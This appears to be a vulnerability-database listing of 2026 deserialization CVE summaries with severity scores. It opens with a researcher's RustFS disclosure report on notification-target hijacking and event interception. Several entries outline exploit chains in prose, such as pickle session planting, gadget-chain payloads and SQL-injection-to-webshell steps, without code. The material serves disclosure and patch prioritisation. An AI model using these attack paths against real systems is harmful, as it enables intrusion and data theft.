Code Injection Deserialization RCE Kiota
NVD GitHub VulDB
CVSS 4.0
7.3
EPSS
0.1%
CVE-2026-40937 Cargo HIGH PATCH GHSA This Week

# Missing Admin Auth on Notification Target Endpoints in RustFS ### Finding Summary All four notification target admin API endpoints in `rustfs/src/admin/handlers/event.rs` use a `check_permissions` helper that validates authentication only (access key + session token), without performing any admin-action authorization via `validate_admin_request`. Every other admin handler in the codebase correctly calls `validate_admin_request` with a specific `AdminAction`. This is the only admin handler file that skips authorization. A non-admin user can overwrite a shared admin-defined notification target by name, causing subsequent bucket events to be delivered to an attacker-controlled endpoint. This enables cross-user event interception and audit evasion. ### What Was Proven Live 1. **Authorization bypass on all four endpoints** (03_readonly_user_bypass.py) - PUT, GET list, GET arns, DELETE all return 200 for readonly-user - Control routes (list-users, kms/status) correctly return 403 - Unauthenticated requests correctly rejected (403 Signature required) 2. **SSRF via health probe** (04_ssrf_listener_landing.py) - HEAD request from rustfs container to attacker-controlled listener - No host validation: only scheme check (http/https) 3. **Target hijacking and event exfiltration** (05_target_hijacking.py, 06_full_event_exfil.py) - Readonly-user overwrites admin-configured target URL by name - Subsequent S3 events delivered to attacker-controlled endpoint - Captured event body includes object keys, bucket names, user identities, and request metadata 4. **Audit evasion** (05_target_hijacking.py) - Readonly-user can delete unbound targets - Readonly-user can overwrite bound targets (silently redirecting events) ### Escalation Vectors Tested But Not Viable 1. **Self-referencing webhook to admin API** (13_self_referencing_test.py) - Webhook sends unsigned POST with event JSON body - Admin endpoints require SigV4 auth -- unsigned request rejected - "Confused deputy" via self-referencing does NOT work 2. **Protocol smuggling via non-HTTP targets** - Only 2 target types implemented: webhook and MQTT (`event.rs:613` enforces this) - No Redis, Kafka, AMQP, or other protocol targets exist - CRLF injection in webhook config fields sanitized by reqwest - MQTT uses rumqttc (pure Rust binary protocol client), no raw TCP injection 3. **MQTT target for RCE** - No unsafe code in MQTT handler - rumqttc 0.29.0 has no known public CVEs - No Command::new, template engines, or deserialization of broker responses 4. **Unauth access** - Endpoints correctly reject unauthenticated requests (403) - Endpoints correctly reject invalid credentials (403) ### Prior Art No existing advisory covers notification target endpoints. 11 published GHSAs on rustfs/rustfs cover different handlers. Closest: - CVE-2026-22042 (ImportIam wrong action constant) -- same bug class, different file - CVE-2026-22043 (deny_only short-circuit) -- different bug class ### Recommendation Submit via GitHub PVR. The finding is well-supported with live PoC, code references, and clear root cause. The fix is straightforward (add `validate_admin_request` calls to event.rs handlers). Core submission should reference 2-3 focused PoC scripts (readonly bypass, target hijack, event exfil), not the full set of 13 exploratory scripts. Koda Reef ### Patch This issue has been patched in version https://github.com/rustfs/rustfs/releases/tag/1.0.0-alpha.94.

SSRF Deserialization Authentication Bypass Redis
NVD GitHub
CVSS 3.1
8.3
EPSS
0.1%
CVE-2026-6857 Maven HIGH PATCH GHSA This Week

Remote code execution in Red Hat Apache Camel Infinispan component allows low-privileged attackers to execute arbitrary code via unsafe deserialization in ProtoStream remote aggregation repository. Exploiting this vulnerability requires network access and low-privilege credentials but grants full system compromise affecting confidentiality, integrity, and availability. The attack complexity is rated high (AC:H), suggesting specific configuration or timing requirements. No active exploitation confirmed at time of analysis (not in CISA KEV), and public exploit code status is unknown.

Deserialization RCE Red Hat Build Of Apache Camel 4 For Quarkus 3 Red Hat Build Of Apache Camel For Spring Boot 4 Red Hat Fuse 7 +2
NVD
CVSS 3.1
7.5
EPSS
0.4%
CVE-2026-6023 HIGH PATCH This Week

Remote code execution in Progress Telerik UI for ASP.NET AJAX via insecure deserialization in the RadFilter control allows unauthenticated remote attackers to execute arbitrary code on the server by tampering with exposed client-side filter state. Affected versions span 2024.4.1114 through 2026.1.421. EPSS data not available; no public exploit or CISA KEV listing identified at time of analysis. The CVSS 8.1 (High) reflects network accessibility but 'High' attack complexity (AC:H), indicating successful exploitation requires specific conditions beyond simple network access.

Deserialization RCE Telerik Ui For Asp Net Ajax
NVD
CVSS 3.1
8.1
EPSS
0.3%
CVE-2026-41136 Go MEDIUM PATCH GHSA This Month

Improper error handling in free5GC AMF prior to version 1.4.3 allows remote attackers to invoke the HTTPUEContextTransfer handler with uninitialized request objects by sending requests with unsupported Content-Type headers. The missing default case in the Content-Type switch statement silently skips deserialization without raising an error, resulting in integrity loss when malformed or crafted payloads reach the processor with null/uninitialized state. CVSS score of 5.5 reflects low integrity impact; publicly available exploit code exists (E:P).

Deserialization Amf Free5gc
NVD GitHub
CVSS 4.0
5.5
EPSS
0.0%
CVE-2026-40343 Go MEDIUM GHSA This Month

Fail-open request handling in free5GC UDR's POST /nudr-dr/v2/policy-data/subs-to-notify endpoint allows Policy Data notification subscriptions to be created with invalid, empty, or partially processed input after HTTP body read or deserialization failures. The handler fails to return after sending error responses (HTTP 500 for body read failure, HTTP 400 for deserialization failure), causing execution to continue and invoke the subscription processor with an uninitialized or malformed PolicyDataSubscription object. This is a logic flaw rather than memory corruption or remote code execution, but it violates fail-secure design principles for a write-capable API and may result in inconsistent subscription state or unintended database entries depending on downstream validation behavior.

Deserialization
NVD GitHub VulDB
CVSS 4.0
6.9
EPSS
0.0%
CVE-2026-39467 HIGH This Week

PHP object injection in MetaSlider Responsive Slider plugin (WordPress) through version 3.106.0 allows authenticated administrators with high privileges to execute arbitrary code by deserializing untrusted data. The vulnerability requires authenticated high-privilege access (PR:H), limiting exploitation to compromised admin accounts or malicious insiders. EPSS data not available; no confirmed active exploitation or public POC identified at time of analysis.

Deserialization Responsive Slider By Metaslider
NVD
CVSS 3.1
7.2
EPSS
0.0%
CVE-2026-25524 PHP HIGH PATCH GHSA This Week

Remote code execution in OpenMage Magento LTS versions prior to 20.17.0 allows unauthenticated attackers to execute arbitrary code by uploading malicious phar archives disguised as images and triggering PHP deserialization via phar:// stream wrappers. The attack requires high complexity (AC:H) to exploit successfully. EPSS data not available, but exploitation requires specific conditions around file upload and path manipulation. Vendor patch available in version 20.17.0, confirmed by GitHub security advisory GHSA-fg79-cr9c-7369.

PHP Adobe Deserialization RCE
NVD GitHub
CVSS 3.1
8.1
EPSS
0.1%
CVE-2026-25917 PyPI HIGH PATCH GHSA This Week

Deserialization vulnerability in Apache Airflow webserver (all versions before 3.2.0) allows network-accessible attackers to execute arbitrary code by injecting malicious XCom payloads, despite vendor-assigned Low severity due to the trusted Dag Author threat model. CVSS 9.8 Critical rating reflects unauthenticated network-based RCE capability (AV:N/PR:N), contradicting the description's trust assumption. EPSS 0.07% (22nd percentile) suggests low immediate exploitation likelihood. No active exploitation confirmed; vendor patch available in version 3.2.0 with public GitHub PR.

Apache Deserialization RCE
NVD GitHub VulDB
CVSS 3.1
7.2
EPSS
0.1%
CVE-2026-40881 Cargo MEDIUM PATCH GHSA This Month

Zebra cryptocurrency node prior to version 4.3.1 allocates excessive memory (up to 233,016 addresses) when deserializing addr/addrv2 protocol messages, even though the specification limits messages to 1,000 addresses. An attacker can trigger out-of-memory crashes by sending multiple oversized address messages over different connections. This is a network-accessible denial of service vulnerability affecting all Zebra versions before 4.3.1, with no public exploit code identified but straightforward to execute given the protocol specification.

Denial Of Service Deserialization
NVD GitHub
CVSS 4.0
6.3
EPSS
0.0%
CVE-2026-40901 HIGH PATCH This Week

DataEase is an open-source data visualization and analytics platform. Versions 2.10.20 and below ship the legacy velocity-1.7.jar, which pulls in commons-collections-3.2.1.jar containing the InvokerTransformer deserialization gadget chain. Quartz 2.3.2, also bundled in the application, deserializes job data BLOBs from the qrtz_job_details table using ObjectInputStream with no deserialization filter or class allowlist. An authenticated attacker who can write to the Quartz job table, such as through the previously described SQL injection in previewSql, can replace a scheduled job's JOB_DATA with a malicious CommonsCollections6 gadget chain payload. When the Quartz cron trigger fires, the payload is deserialized and executes arbitrary commands as root inside the container, achieving full remote code execution. This issue has been fixed in version 2.10.21.

Deserialization SQLi RCE Dataease
NVD GitHub
CVSS 4.0
7.5
EPSS
0.4%
CVE-2026-40899 HIGH PATCH This Week

DataEase is an open-source data visualization and analytics platform. Versions 2.10.20 and below contain a JDBC parameter blocklist bypass vulnerability in the MySQL datasource configuration. The Mysql class uses Lombok's @Data annotation, which auto-generates a public setter for the illegalParameters field that contains the JDBC security blocklist. When a datasource configuration is submitted as JSON, Jackson deserialization calls setIllegalParameters with an attacker-supplied empty list, replacing the blocklist before getJdbc() validation runs. This allows an authenticated attacker to include dangerous JDBC parameters such as allowLoadLocalInfile=true, and by pointing the datasource at a rogue MySQL server, exploit the LOAD DATA LOCAL INFILE protocol feature to read arbitrary files from the DataEase server filesystem, including sensitive environment variables and database credentials. This issue has been fixed in version 2.10.21.

Deserialization Dataease
NVD GitHub
CVSS 4.0
8.3
EPSS
0.0%
CVE-2026-5426 CRITICAL PATCH Act Now

Remote code execution in Digital Knowledge KnowledgeDeliver (all versions prior to February 24, 2026) via malicious ViewState deserialization. A hard-coded ASP.NET machineKey allows unauthenticated remote attackers to bypass ViewState validation and execute arbitrary code on the server. Mandiant reported this critical deserialization vulnerability. EPSS score of 0.08% (24th percentile) suggests low observed exploitation activity, though no public exploit is confirmed at time of analysis. CVSS vector indicates network-accessible attack requiring no privileges or user interaction, but the 7.5 score reflects only Confidentiality impact-real-world RCE capability makes this significantly more severe than the partial CVSS rating suggests.

Deserialization RCE Knowledgedeliver
NVD GitHub VulDB
CVSS 3.1
9.1
EPSS
0.1%
CVE-2025-15610 CRITICAL Act Now

Deserialization of untrusted data vulnerability in OpenText, Inc RightFax on Windows, 64 bit, 32 bit allows Object Injection.This issue affects RightFax: through 25.4.

Deserialization Microsoft
NVD VulDB
CVSS 4.0
9.3
EPSS
0.0%
CVE-2026-39842 Maven CRITICAL PATCH GHSA Act Now

Remote code execution as root in OpenRemote IoT platform's rules engine (versions prior to 1.20.3) allows authenticated non-superuser attackers with write:rules role to execute arbitrary Java code via unsandboxed JavaScript rulesets. The vulnerability stems from Nashorn ScriptEngine.eval() executing user-supplied JavaScript without ClassFilter restrictions, enabling Java.type() access to any JVM class including java.lang.Runtime. Attackers can compromise the entire multi-tenant platform, steal c

Information Disclosure RCE Apple Docker Deserialization +5
NVD GitHub
CVSS 3.1
9.9
EPSS
0.1%
CVE-2026-40249 Go MEDIUM GHSA This Month

Free5GC UDR service fails to terminate request processing after HTTP body retrieval or JSON deserialization errors in the PUT /nudr-dr/v2/policy-data/subs-to-notify/{subsId} endpoint, allowing unintended modification of Policy Data notification subscriptions with invalid or partially processed input. The handler lacks return statements following error responses, causing execution to continue to the downstream processor with uninitialized or empty subscription objects. No public exploit code or active exploitation has been confirmed; this is a robustness and input validation flaw affecting write operations on a core 5G network function.

Deserialization
NVD GitHub
CVSS 4.0
6.9
EPSS
0.1%
CVE-2026-40245 Go HIGH GHSA This Week

Unauthenticated access to free5GC UDR subscriber identifiers exposes SUPI/IMSI values via unprotected 5G Service Based Interface endpoint. Missing return statements in free5GC UDR versions prior to 4.2.1 allow attackers to retrieve complete subscriber databases with a single parameterless HTTP GET request, undermining 3GPP SUCI privacy mechanisms. Public exploit code exists. EPSS score is low (0.10%) indicating limited observed exploitation, but impact is severe for exposed deployments with misconfigured network segmentation.

Information Disclosure Deserialization
NVD GitHub
CVSS 3.1
7.5
EPSS
0.1%
CVE-2026-27303 CRITICAL Act Now

Remote code execution in Adobe Connect 12.10 and earlier (including 2025.3) allows unauthenticated attackers to execute arbitrary code by exploiting unsafe deserialization. Attack requires no user interaction despite UI:R in CVSS vector, with scope change enabling container escape or privilege escalation beyond the application context. Adobe released patch APSB26-37. EPSS score of 1.50% (81st percentile) indicates moderate exploitation probability. No active exploitation confirmed (SSVC: exploitation=none), but deserialization flaws are commonly targeted once details emerge.

RCE Deserialization Adobe
NVD
CVSS 3.1
9.6
EPSS
1.5%
CVE-2026-34615 CRITICAL Act Now

Remote code execution in Adobe Connect 12.10 and earlier allows unauthenticated network attackers to execute arbitrary code via deserialization of untrusted data. The vulnerability has changed scope (CVSS 9.3), enabling impact beyond the vulnerable component. Adobe issued patch APSB26-37. EPSS indicates 81st percentile risk with 1.44% probability, and CISA SSVC reports no active exploitation. The CVSS vector conflicts with the description: vector indicates user interaction required (UI:R) while description states 'does not require user interaction' - verify actual interaction requirements with Adobe advisory.

RCE Deserialization Adobe
NVD
CVSS 3.1
9.3
EPSS
1.4%
CVE-2026-32192 HIGH PATCH Exploit Unlikely This Week

Privilege escalation in Azure Monitor Agent versions prior to 1.41.0 exploits insecure deserialization of untrusted data, allowing authenticated local attackers with low privileges to achieve full system compromise (high confidentiality, integrity, and availability impact). CVSS 7.8 severity reflects local attack vector with low complexity and no user interaction required. No public exploit identified at time of analysis, though the vulnerability class (CWE-502) is well-understood and frequently targeted. Microsoft has released patch version 1.41.0 to address this flaw.

Deserialization Microsoft
NVD VulDB
CVSS 3.1
7.8
EPSS
0.4%
CVE-2026-32184 HIGH PATCH Exploit Unlikely This Week

Deserialization of untrusted data in Microsoft HPC Pack 2019 enables authenticated local attackers to escalate privileges to SYSTEM level. Affects all versions below 6.3.8355. Vendor-released patch available via Microsoft Security Response Center. CVSS 7.8 reflects high impact (complete system compromise) with low attack complexity requiring only low-level authenticated access. No public exploit identified at time of analysis, though CWE-502 deserialization flaws are well-understood and commonly weaponized once technical details emerge.

Deserialization Microsoft
NVD VulDB
CVSS 3.1
7.8
EPSS
0.4%
CVE-2026-3017 HIGH This Week

PHP object injection in Smart Post Show WordPress plugin versions ≤3.0.12 allows administrators to deserialize untrusted input via the import_shortcodes() function. While no POP chain exists in the plugin itself (making direct exploitation impossible), the vulnerability becomes critical if paired with another plugin/theme containing exploitable gadget chains, potentially enabling file deletion, data exfiltration, or remote code execution. CVSS 7.2 (High) reflects theoretical maximum impact. No public exploit identified at time of analysis, with EPSS data unavailable for this recent CVE identifier.

PHP WordPress Information Disclosure Deserialization
NVD
CVSS 3.1
7.2
EPSS
0.0%
CVE-2026-32271 PHP HIGH PATCH GHSA This Week

Remote code execution via SQL injection in Craft Commerce 4.x (4.0.0-4.10.2) and 5.x (5.0.0-5.5.4) allows authenticated control panel users to write PHP webshells through a four-step exploitation chain. Attack exploits unsanitized TotalRevenue widget settings interpolated into SQL, PDO multi-statement support, and unsafe PHP deserialization in yii2-queue to instantiate a GuzzleHttp FileCookieJar gadget chain. Complete exploitation requires only three HTTP requests and low-privileged authenticati

SQLi Deserialization RCE PHP
NVD GitHub VulDB
CVSS 4.0
7.7
EPSS
0.2%
CVE-2026-40044 CRITICAL Act Now

Remote code execution in Pachno 1.0.6 allows unauthenticated attackers to achieve arbitrary code execution by exploiting unsafe deserialization of PHP objects. Attackers write malicious serialized payloads to world-writable cache files with predictable names, which are automatically unserialized during framework bootstrap before authentication occurs. EPSS indicates 0.14% probability of exploitation (33rd percentile), no active exploitation confirmed per CISA KEV, and SSVC classifies this as automatable with total technical impact.

PHP Deserialization RCE
NVD VulDB
CVSS 4.0
9.3
EPSS
0.1%
CVE-2026-1462 PyPI HIGH PATCH GHSA This Week

Arbitrary code execution in Keras 3.13.0 occurs because the TFSMLayer class unconditionally loads attacker-supplied TensorFlow SavedModels while deserializing a .keras model, even with safe_mode=True engaged. Any user who loads a malicious model triggers attacker-controlled code at inference time under their own privileges, defeating the protection safe_mode is supposed to provide. The flaw (CWE-502) has publicly available exploit code via huntr but is not in CISA KEV; EPSS is very low at 0.06% (19th percentile), consistent with the local, user-interaction-dependent attack path.

RCE Deserialization Keras Team Keras
NVD GitHub VulDB
CVSS 3.1
7.8
EPSS
0.1%
CVE-2026-33858 PyPI HIGH PATCH GHSA This Week

Remote code execution in Apache Airflow 3.1.x allows authenticated DAG Authors to execute arbitrary code in the webserver context through crafted XCom payloads exploiting insecure deserialization (CWE-502). Affects Apache Airflow versions 3.1.8 through <3.2.0. Despite CVSS 8.8, vendor rates severity as Low due to DAG Authors being highly trusted roles. No public exploit identified at time of analysis, with EPSS exploitation probability at 0.07% (21st percentile), indicating minimal real-world risk. Vendor-released patch: Apache Airflow 3.2.0.

Deserialization Apache RCE
NVD GitHub VulDB
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-35337 Maven HIGH PATCH GHSA This Week

Remote code execution in Apache Storm before 2.8.6 allows authenticated users with topology submission rights to execute arbitrary code on Nimbus and Worker JVMs via crafted serialized objects in Kerberos TGT credentials. The vulnerability exploits unsafe deserialization in the Nimbus Thrift API (CWE-502) with CVSS 8.8. No active exploitation confirmed (EPSS 0.30%, SSVC exploitation status: none), but the low attack complexity and network attack vector make this a critical patch priority for Storm deployments with authenticated users.

RCE Apache Deserialization
NVD VulDB
CVSS 3.1
8.8
EPSS
0.3%
CVE-2026-25204 MEDIUM This Month

Deserialization of untrusted data in Samsung Open Source Escargot JavaScript engine prior to commit 97e8115ab1110bc502b4b5e4a0c689a71520d335 allows local attackers without privileges to trigger a denial of service condition via process abort. The vulnerability exploits unsafe deserialization of Java objects, resulting in application termination rather than code execution. No public exploit code or active exploitation has been identified at the time of analysis.

Deserialization Samsung Denial Of Service Java
NVD GitHub VulDB
CVSS 3.1
6.2
EPSS
0.0%
CVE-2026-5507 MEDIUM This Month

wolfSSL versions up to 5.9.0 allow arbitrary memory deallocation via unsafe deserialization of poisoned session cache data. An attacker with high privileges who can inject a crafted session into the cache and trigger specific session restore API calls can cause memory corruption with availability impact. No public exploit code or active exploitation has been confirmed; the vulnerability requires precise conditions including local access, high privileges, and user interaction.

Deserialization Wolfssl
NVD GitHub VulDB
CVSS 4.0
4.1
EPSS
0.0%
CVE-2026-3199 CRITICAL PATCH Act Now

Remote code execution in Sonatype Nexus Repository 3.22.1-3.90.2 allows authenticated attackers with task creation permissions to execute arbitrary code via unsafe deserialization in the task management component. Exploitation bypasses the nexus.scripts.allowCreation security control, granting unauthorized code execution on the server. CVSS 9.4 (Critical). No public exploit identified at time of analysis. Attack requires low-privileged authentication (PR:L) and network access but no user interaction.

RCE Deserialization
NVD GitHub
CVSS 4.0
9.4
EPSS
0.1%
CVE-2026-40087 PyPI MEDIUM PATCH GHSA This Month

LangChain's f-string prompt-template validation allows information disclosure through attribute access and nested format-specifier injection in DictPromptTemplate and ImagePromptTemplate classes. Unauthenticated remote attackers can craft malicious template strings to expose internal object state, model context, or logs when templates are formatted with rich Python objects. Practical impact is limited to applications that accept untrusted template strings (not just variable values) and pass complex objects into template formatting; hardcoded templates and value-only user input are unaffected. Vendor-released patch available in langchain-core 0.3.84 and 1.2.28.

Python Deserialization Red Hat
NVD GitHub VulDB
CVSS 3.1
5.3
EPSS
0.0%
CVE-2026-39890 PyPI CRITICAL PATCH GHSA Act Now

Unsafe YAML deserialization in PraisonAI allows remote code execution through malicious agent definition files. The AgentService.loadAgentFromFile method uses js-yaml.load without safe schema restrictions, permitting dangerous tags like !!js/function that execute arbitrary JavaScript. Unauthenticated attackers can upload crafted YAML files via API endpoints to achieve complete server compromise. Affects PraisonAI prior to v4.5.115. Publicly available exploit code exists via proof-of-concept demonstrating command execution.

RCE Deserialization
NVD GitHub
CVSS 3.1
9.8
EPSS
0.3%
CVE-2026-32590 HIGH This Week

Authenticated remote code execution in Red Hat Quay 3 and Mirror Registry for Red Hat OpenShift arises from unsafe deserialization (CWE-502) of resumable container image layer upload state stored in the database. An attacker with the privileges needed to initiate image uploads can tamper with intermediate upload data to execute arbitrary code on the Quay server. No public exploit identified at time of analysis; EPSS is low (0.06%) and CISA SSVC marks exploitation status as none, though technical impact is rated total.

Red Hat Deserialization RCE Mirror Registry For Red Hat Openshift Mirror Registry For Red Hat Openshift 2 +1
NVD VulDB
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-3296 CRITICAL Act Now

PHP object injection in Everest Forms for WordPress (all versions ≤3.4.3) allows unauthenticated remote attackers to achieve critical system compromise. Attackers submit malicious serialized payloads through any public form field, which persist through sanitization into the wp_evf_entrymeta database table. When administrators view form entries, unsafe unserialize() without class restrictions processes the payload, enabling arbitrary code execution. CVSS 9.8 (Critical) reflects network-accessible

WordPress PHP Deserialization
NVD
CVSS 3.1
9.8
EPSS
0.0%
CVE-2026-3357 HIGH PATCH This Week

Remote code execution in IBM Langflow Desktop versions 1.6.0 through 1.8.2 allows authenticated attackers to execute arbitrary code via unsafe deserialization in the FAISS component. The vulnerability stems from an insecure default configuration that permits deserialization of untrusted data. With CVSS 8.8 (High) reflecting network accessibility, low complexity, and full impact on confidentiality, integrity, and availability, this represents a critical risk for organizations running affected versions. Vendor-released patch available through IBM security advisory. No public exploit identified at time of analysis, though the attack path is well-understood given the CWE-502 deserialization vulnerability class.

Deserialization RCE IBM
NVD VulDB
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-24156 HIGH This Week

Arbitrary code execution in NVIDIA DALI (all versions prior to 2.0) allows local authenticated attackers with low privileges to execute malicious code by exploiting insecure deserialization of untrusted data, requiring user interaction. EPSS exploitation probability and KEV status data not available; no public exploit identified at time of analysis. The vulnerability affects NVIDIA's Data Loading Library, a critical component in AI/ML data preprocessing pipelines.

Nvidia RCE Deserialization Dali
NVD VulDB
CVSS 3.1
7.3
EPSS
0.1%
CVE-2026-33439 Maven CRITICAL POC PATCH GHSA Act Now

Remote code execution in OpenIdentityPlatform OpenAM 16.0.5 and earlier allows unauthenticated attackers to execute arbitrary OS commands via unsafe Java deserialization of the jato.clientSession HTTP parameter. This bypass exploits an unpatched deserialization sink in JATO's ClientSession.deserializeAttributes() that was overlooked when CVE-2021-35464 was mitigated. Attackers can target any JATO ViewBean endpoint with <jato:form> tags (commonly found in password reset pages) using a PriorityQue

Deserialization RCE Java Apache Tomcat +3
NVD GitHub
CVSS 4.0
9.3
EPSS
0.1%
CVE-2026-35554 Maven HIGH PATCH GHSA This Week

Buffer use-after-free in Apache Kafka Java producer client (versions ≤3.9.1, ≤4.0.1, ≤4.1.1) can silently route messages to incorrect topics when batch expiration races with in-flight network requests. CVSS 8.7 (High) with network-accessible attack vector and high complexity. CISA SSVC indicates no active exploitation, non-automatable attack, and partial technical impact. No public exploit identified at time of analysis. EPSS data not provided, but the combination of high CVSS, cross-scope impact (S:C), and dual confidentiality/integrity impact warrants prioritization for environments processing sensitive message streams.

Information Disclosure Memory Corruption Apache Use After Free Deserialization +3
NVD HeroDevs
CVSS 3.1
8.7
EPSS
0.0%
CVE-2026-1839 PyPI HIGH PATCH GHSA This Week

Remote code execution in HuggingFace Transformers library allows arbitrary code execution via malicious checkpoint files. The `_load_rng_state()` method in the `Trainer` class calls `torch.load()` without the `weights_only=True` parameter, enabling deserialization attacks when PyTorch versions below 2.6 are used with torch>=2.2. An attacker can craft a malicious `rng_state.pth` checkpoint file that executes arbitrary code when loaded by an application using affected Transformers versions. The fix is available in version v5.0.0rc3, and no public exploit has been independently confirmed at time of analysis.

RCE Deserialization Huggingface Transformers
NVD GitHub
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-5659 LOW POC PATCH Monitor

Unsafe deserialization in pytries datrie through version 0.8.3 enables remote code execution when loading untrusted trie files via Trie.load(), Trie.read(), or Trie.__setstate__(). Unauthenticated remote attackers can exploit this vulnerability by crafting malicious serialized trie objects; publicly available exploit code exists, and the maintainers have not yet addressed the issue despite early notification.

Deserialization Datrie
NVD VulDB GitHub
CVSS 4.0
2.1
EPSS
0.0%
CVE-2026-5536 MEDIUM This Month

Unsafe deserialization in FedML-AI FedML's gRPC server allows unauthenticated remote attackers to achieve confidentiality, integrity, and availability compromise through malicious payloads sent to the sendMessage function in versions up to 0.8.9. EPSS data not available; no CISA KEV listing indicates no confirmed active exploitation at time of analysis. Vendor unresponsive to coordinated disclosure attempts, raising concerns about patch availability and ongoing risk for production deployments of this federated machine learning framework.

Deserialization Fedml
NVD VulDB GitHub
CVSS 4.0
6.9
EPSS
0.0%
CVE-2026-35464 PyPI HIGH GHSA This Week

Arbitrary code execution in pyload-ng via pickle deserialization allows non-admin users with SETTINGS and ADD permissions to write malicious session files and trigger unauthenticated RCE. Attackers redirect the download directory to Flask's session store (/tmp/pyLoad/flask), plant a crafted pickle payload as a predictable session filename, then trigger deserialization by sending any HTTP request with the corresponding session cookie. This bypasses CVE-2026-33509 fix controls because storage_folder was not added to ADMIN_ONLY_OPTIONS. No public exploit identified at time of analysis, though detailed proof-of-concept methodology is documented in the advisory. EPSS data not available for this recent CVE.

RCE Deserialization Docker Python
NVD GitHub
CVSS 3.1
7.5
EPSS
0.1%
CVE-2026-5473 LOW Monitor

Unsafe deserialization in NASA cFS Pickle Module (versions up to 7.0.0) allows authenticated local attackers with low privileges to trigger remote code execution or information disclosure through the pickle.load() function. The vulnerability requires high attack complexity and local access, limiting its practical exploitation scope. Public exploit code is available, but the issue remains unpatched as of the last vendor update.

Deserialization Core Flight System
NVD GitHub VulDB
CVSS 4.0
1.1
EPSS
0.0%
CVE-2026-35537 PHP LOW PATCH GHSA Monitor

Unsafe deserialization in Roundcube Webmail's Redis/Memcache session handler allows unauthenticated remote attackers to write arbitrary files by crafting malicious session data. Affected versions include all 1.6.x before 1.6.14 and all 1.5.x before 1.5.14. While the CVSS score of 3.7 is low and attack complexity is high, the integrity impact (arbitrary file write) poses a real risk to instances using Redis or Memcache for session storage.

Deserialization Redis
NVD GitHub VulDB
CVSS 3.1
3.7
EPSS
0.0%
CVE-2026-34838 CRITICAL PATCH Act Now

Remote Code Execution in Group-Office enterprise CRM via insecure deserialization allows authenticated attackers to write arbitrary files and execute code on the server. Affects all versions prior to 6.8.156, 25.0.90, and 26.0.12 across multiple product branches. CVSS 9.9 (Critical) with network-based attack vector requiring only low-privileged authentication. No public exploit identified at time of analysis, though the technical details in the GitHub Security Advisory provide sufficient impleme

Microsoft Deserialization RCE
NVD GitHub
CVSS 3.1
9.9
EPSS
0.5%
CVE-2026-29782 PHP HIGH PATCH GHSA This Week

Remote code execution in OpenSTAManager v2.10.1 and earlier allows authenticated attackers to achieve unauthenticated RCE via chained exploitation of arbitrary SQL injection (GHSA-2fr7-cc4f-wh98) and insecure PHP deserialization in the oauth2.php endpoint. The unauthenticated oauth2.php file calls unserialize() on attacker-controlled database content without class restrictions, enabling gadget chain exploitation (Laravel/RCE22) to execute arbitrary system commands as www-data. Attack requires in

PHP Deserialization Docker Denial Of Service Google +2
NVD GitHub
CVSS 3.1
7.2
EPSS
0.0%
CVE-2026-24165 HIGH This Week

Deserialization of untrusted data in NVIDIA BioNeMo Framework enables local attackers to execute arbitrary code, cause denial of service, disclose sensitive information, or tamper with data when users open malicious files. CVSS 7.8 (High) reflects local attack vector requiring user interaction. EPSS data not available; no public exploit identified at time of analysis. Affects NVIDIA BioNeMo Framework, a platform for AI-driven drug discovery and biomolecular research.

Deserialization RCE Denial Of Service Information Disclosure Nvidia
NVD VulDB
CVSS 3.1
7.8
EPSS
0.1%
CVE-2026-24164 HIGH NEWS This Week

Insecure deserialization in NVIDIA BioNeMo Framework enables remote code execution when attackers can induce users to process malicious serialized data. This vulnerability (CWE-502) affects the BioNeMo Framework with network-reachable attack surface (AV:N) and low complexity (AC:L), requiring only user interaction (UI:R) but no authentication (PR:N). The CVSS 8.8 rating reflects critical impacts across confidentiality, integrity, and availability. No public exploit identified at time of analysis, though the deserialization vulnerability class is well-understood and commonly exploited. EPSS data not available for this CVE.

Deserialization RCE Denial Of Service Information Disclosure Nvidia
NVD VulDB
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-4266 HIGH This Week

Insecure deserialization in WatchGuard Fireware OS enables local code execution as the portald user when combined with a filesystem write primitive. Affects Fireware OS versions 12.1 through 12.11.8 and 2025.1 through 2026.1.2 on platforms supporting Access Portal (excludes T-15/T-35 models). CVSS 8.4 severity reflects high impact but requires prior high-privilege local access and an existing write vulnerability to exploit. No public exploit identified at time of analysis, with EPSS data unavailable for risk probability assessment.

Deserialization RCE Fireware Os
NVD VulDB
CVSS 4.0
8.4
EPSS
0.1%
CVE-2026-4416 HIGH PATCH This Week

Insecure deserialization in Gigabyte Control Center's Performance Library component allows authenticated local users to escalate privileges to SYSTEM by sending crafted serialized payloads to the EasyTune Engine service. Affecting Gigabyte Performance Library across versions, this CWE-502 flaw enables low-privileged users to gain complete control of the Windows system. EPSS data not available; no public exploit identified at time of analysis, though the local attack vector and low complexity (CVSS:3.1/AV:L/AC:L/PR:L) suggest exploitation is technically straightforward for attackers with initial local access.

Deserialization Privilege Escalation Performance Library
NVD VulDB
CVSS 4.0
8.5
EPSS
0.0%
CVE-2026-4851 CRITICAL Act Now

Arbitrary Perl code execution in GRID::Machine through version 0.127 occurs when clients connect to remote hosts via RPC over SSH, as the client-side deserializer uses eval() on untrusted data from the remote peer without validation. A compromised or malicious remote host can inject arbitrary Perl code into Dumper-formatted responses that executes silently on the client during RPC calls, while maintaining correct return values to avoid detection. The vulnerability is design-inherent but the trust requirement for remote hosts is not documented, creating a security expectation mismatch for users.

Deserialization RCE Grid
NVD VulDB
CVSS 3.1
9.8
EPSS
0.1%
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

Allocation amplification in Zebra network deserializers allows unauthenticated remote peers to force excessive memory preallocation and parsing overhead across multiple message types (headers, blocks, transactions) by exploiting the use of generic transport/block-size ceilings instead of protocol-specific limits. An attacker can trigger 8.8x oversized header allocations, unbounded equihash solution parsing, and inflated Sapling spend vector allocations on inbound peer messages, causing denial of service through cumulative per-connection and multi-peer fan-in effects. CVSS 5.3 (AV:N/AC:L/PR:N/UI:N) indicates network-accessible, unauthenticated exploitation of default configurations; no public exploit identified at time of analysis, but vendor-released patch available in Zebra 4.4.0.

Denial Of Service Deserialization
NVD GitHub
EPSS 0% CVSS 7.5
HIGH PATCH This Week

